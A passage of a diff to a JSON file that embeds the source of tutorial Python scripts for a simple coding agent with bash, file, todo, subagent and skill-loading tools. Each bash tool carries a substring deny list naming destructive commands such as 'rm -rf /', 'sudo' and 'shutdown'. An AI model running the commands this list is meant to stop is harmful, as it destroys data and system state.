raise ValueError(f\"Item {item_id}: invalid status '{status}'\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item_id, \"text\": text, \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress at a time\")\n self.items = validated\n return self.render()\n\n def render(self) -> str:\n if not self.items:\n return \"No todos.\"\n lines = []\n for item in self.items:\n marker = {\"pending\": \"[ ]\", \"in_progress\": \"[>]\", \"completed\": \"[x]\"}[item[\"status\"]]\n lines.append(f\"{marker} #{item['id']}: {item['text']}\")\n done = sum(1 for t in self.items if t[\"status\"] == \"completed\")\n lines.append(f\"\\n({done}/{len(self.items)} completed)\")\n return \"\\n\".join(lines)\n\n\nTODO = TodoManager()\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"todo\", \"description\": \"Update task list. Track progress on multi-step tasks.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"items\": {\"type\": \"array\", \"items\": {\"type\": \"object\", \"properties\": {\"id\": {\"type\": \"string\"}, \"text\": {\"type\": \"string\"}, \"status\": {\"type\": \"string\", \"enum\": [\"pending\", \"in_progress\", \"completed\"]}}, \"required\": [\"id\", \"text\", \"status\"]}}}, \"required\": [\"items\"]}},\n]\n\n\n# -- Agent loop with nag reminder injection --\ndef agent_loop(messages: list):\n rounds_since_todo = 0\n while True:\n # Nag reminder is injected below, alongside tool results\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n used_todo = False\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n if block.name == \"todo\":\n used_todo = True\n rounds_since_todo = 0 if used_todo else rounds_since_todo + 1\n if rounds_since_todo >= 3:\n results.append({\"type\": \"text\", \"text\": \"Update your todos.\"})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms03 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s04", "filename": "s04_subagent.py", "title": "Subagents", "subtitle": "Clean Context Per Subtask", - "loc": 151, + "loc": 154, "tools": [ "bash", "read_file", @@ -168,48 +168,48 @@ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 46 + "startLine": 47 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 52 + "startLine": 53 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 64 + "startLine": 67 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 73 + "startLine": 76 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 82 + "startLine": 85 }, { "name": "run_subagent", "signature": "def run_subagent(prompt: str)", - "startLine": 115 + "startLine": 118 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 143 + "startLine": 146 } ], "layer": "planning", - "source": "#!/usr/bin/env python3\n\"\"\"\ns04_subagent.py - Subagents\n\nSpawn a child agent with fresh messages=[]. The child works in its own\ncontext, sharing the filesystem, then returns only a summary to the parent.\n\n Parent agent Subagent\n +------------------+ +------------------+\n | messages=[...] | | messages=[] | <-- fresh\n | | dispatch | |\n | tool: task | ---------->| while tool_use: |\n | prompt=\"...\" | | call tools |\n | description=\"\" | | append results |\n | | summary | |\n | result = \"...\" | <--------- | return last text |\n +------------------+ +------------------+\n |\n Parent context stays clean.\n Subagent context is discarded.\n\nKey insight: \"Process isolation gives context isolation for free.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use the task tool to delegate exploration or subtasks.\"\nSUBAGENT_SYSTEM = f\"You are a coding subagent at {WORKDIR}. Complete the given task, then summarize your findings.\"\n\n\n# -- Tool implementations shared by parent and child --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\n# Child gets all base tools except task (no recursive spawning)\nCHILD_TOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\n# -- Subagent: fresh context, filtered tools, summary-only return --\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}] # fresh context\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM, messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n # Only the final text returns to the parent -- child context is discarded\n return \"\".join(b.text for b in response.content if hasattr(b, \"text\")) or \"(no summary)\"\n\n\n# -- Parent tools: base tools + task dispatcher --\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\", \"description\": \"Spawn a subagent with fresh context. It shares the filesystem but not conversation history.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"prompt\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\", \"description\": \"Short description of the task\"}}, \"required\": [\"prompt\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=PARENT_TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"task\":\n desc = block.input.get(\"description\", \"subtask\")\n print(f\"> task ({desc}): {block.input['prompt'][:80]}\")\n output = run_subagent(block.input[\"prompt\"])\n else:\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n print(f\" {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms04 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: context isolation -- protecting the model's clarity of thought.\n\"\"\"\ns04_subagent.py - Subagents\n\nSpawn a child agent with fresh messages=[]. The child works in its own\ncontext, sharing the filesystem, then returns only a summary to the parent.\n\n Parent agent Subagent\n +------------------+ +------------------+\n | messages=[...] | | messages=[] | <-- fresh\n | | dispatch | |\n | tool: task | ---------->| while tool_use: |\n | prompt=\"...\" | | call tools |\n | description=\"\" | | append results |\n | | summary | |\n | result = \"...\" | <--------- | return last text |\n +------------------+ +------------------+\n |\n Parent context stays clean.\n Subagent context is discarded.\n\nKey insight: \"Process isolation gives context isolation for free.\"\n\"\"\"\n\nimport os\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use the task tool to delegate exploration or subtasks.\"\nSUBAGENT_SYSTEM = f\"You are a coding subagent at {WORKDIR}. Complete the given task, then summarize your findings.\"\n\n\n# -- Tool implementations shared by parent and child --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n except (FileNotFoundError, OSError) as e:\n return f\"Error: {e}\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\n# Child gets all base tools except task (no recursive spawning)\nCHILD_TOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\n# -- Subagent: fresh context, filtered tools, summary-only return --\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}] # fresh context\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM, messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n # Only the final text returns to the parent -- child context is discarded\n return \"\".join(b.text for b in response.content if hasattr(b, \"text\")) or \"(no summary)\"\n\n\n# -- Parent tools: base tools + task dispatcher --\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\", \"description\": \"Spawn a subagent with fresh context. It shares the filesystem but not conversation history.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"prompt\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\", \"description\": \"Short description of the task\"}}, \"required\": [\"prompt\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=PARENT_TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n if block.name == \"task\":\n desc = block.input.get(\"description\", \"subtask\")\n prompt = block.input.get(\"prompt\", \"\")\n print(f\"> task ({desc}): {prompt[:80]}\")\n output = run_subagent(prompt)\n else:\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n print(f\" {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms04 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s05", "filename": "s05_skill_loading.py", "title": "Skills", "subtitle": "Load on Demand", - "loc": 187, + "loc": 188, "tools": [ "bash", "read_file", @@ -225,51 +225,51 @@ "classes": [ { "name": "SkillLoader", - "startLine": 57, - "endLine": 105 + "startLine": 59, + "endLine": 106 } ], "functions": [ { "name": "safe_path", "signature": "def safe_path(p: str)", - "startLine": 117 + "startLine": 118 }, { "name": "run_bash", "signature": "def run_bash(command: str)", - "startLine": 123 + "startLine": 124 }, { "name": "run_read", "signature": "def run_read(path: str, limit: int = None)", - "startLine": 135 + "startLine": 136 }, { "name": "run_write", "signature": "def run_write(path: str, content: str)", - "startLine": 144 + "startLine": 145 }, { "name": "run_edit", "signature": "def run_edit(path: str, old_text: str, new_text: str)", - "startLine": 153 + "startLine": 154 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 187 + "startLine": 188 } ], "layer": "planning", - "source": "#!/usr/bin/env python3\n\"\"\"\ns05_skill_loading.py - Skills\n\nTwo-layer skill injection that avoids bloating the system prompt:\n\n Layer 1 (cheap): skill names in system prompt (~100 tokens/skill)\n Layer 2 (on demand): full skill body in tool_result\n\n skills/\n pdf/\n SKILL.md <-- frontmatter (name, description) + body\n code-review/\n SKILL.md\n\n System prompt:\n +--------------------------------------+\n | You are a coding agent. |\n | Skills available: |\n | - pdf: Process PDF files... | <-- Layer 1: metadata only\n | - code-review: Review code... |\n +--------------------------------------+\n\n When model calls load_skill(\"pdf\"):\n +--------------------------------------+\n | tool_result: |\n | |\n | Full PDF processing instructions | <-- Layer 2: full body\n | Step 1: ... |\n | Step 2: ... |\n | |\n +--------------------------------------+\n\nKey insight: \"Don't put everything in the system prompt. Load on demand.\"\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nSKILLS_DIR = WORKDIR / \"skills\"\n\n\n# -- SkillLoader: scan skills//SKILL.md with YAML frontmatter --\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills_dir = skills_dir\n self.skills = {}\n self._load_all()\n\n def _load_all(self):\n if not self.skills_dir.exists():\n return\n for f in sorted(self.skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body, \"path\": str(f)}\n\n def _parse_frontmatter(self, text: str) -> tuple:\n \"\"\"Parse YAML frontmatter between --- delimiters.\"\"\"\n match = re.match(r\"^---\\n(.*?)\\n---\\n(.*)\", text, re.DOTALL)\n if not match:\n return {}, text\n meta = {}\n for line in match.group(1).strip().splitlines():\n if \":\" in line:\n key, val = line.split(\":\", 1)\n meta[key.strip()] = val.strip()\n return meta, match.group(2).strip()\n\n def get_descriptions(self) -> str:\n \"\"\"Layer 1: short descriptions for the system prompt.\"\"\"\n if not self.skills:\n return \"(no skills available)\"\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"No description\")\n tags = skill[\"meta\"].get(\"tags\", \"\")\n line = f\" - {name}: {desc}\"\n if tags:\n line += f\" [{tags}]\"\n lines.append(line)\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n \"\"\"Layer 2: full skill body returned in tool_result.\"\"\"\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'. Available: {', '.join(self.skills.keys())}\"\n return f\"\\n{skill['body']}\\n\"\n\n\nSKILL_LOADER = SkillLoader(SKILLS_DIR)\n\n# Layer 1: skill metadata injected into system prompt\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nUse load_skill to access specialized knowledge before tackling unfamiliar topics.\n\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\", \"> /dev/\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"load_skill\", \"description\": \"Load specialized knowledge by name.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\", \"description\": \"Skill name to load\"}}, \"required\": [\"name\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms05 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: on-demand knowledge -- domain expertise, loaded when the model asks.\n\"\"\"\ns05_skill_loading.py - Skills\n\nTwo-layer skill injection that avoids bloating the system prompt:\n\n Layer 1 (cheap): skill names in system prompt (~100 tokens/skill)\n Layer 2 (on demand): full skill body in tool_result\n\n skills/\n pdf/\n SKILL.md <-- frontmatter (name, description) + body\n code-review/\n SKILL.md\n\n System prompt:\n +--------------------------------------+\n | You are a coding agent. |\n | Skills available: |\n | - pdf: Process PDF files... | <-- Layer 1: metadata only\n | - code-review: Review code... |\n +--------------------------------------+\n\n When model calls load_skill(\"pdf\"):\n +--------------------------------------+\n | tool_result: |\n | |\n | Full PDF processing instructions | <-- Layer 2: full body\n | Step 1: ... |\n | Step 2: ... |\n | |\n +--------------------------------------+\n\nKey insight: \"Don't put everything in the system prompt. Load on demand.\"\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport yaml\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nSKILLS_DIR = WORKDIR / \"skills\"\n\n\n# -- SkillLoader: scan skills//SKILL.md with YAML frontmatter --\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills_dir = skills_dir\n self.skills = {}\n self._load_all()\n\n 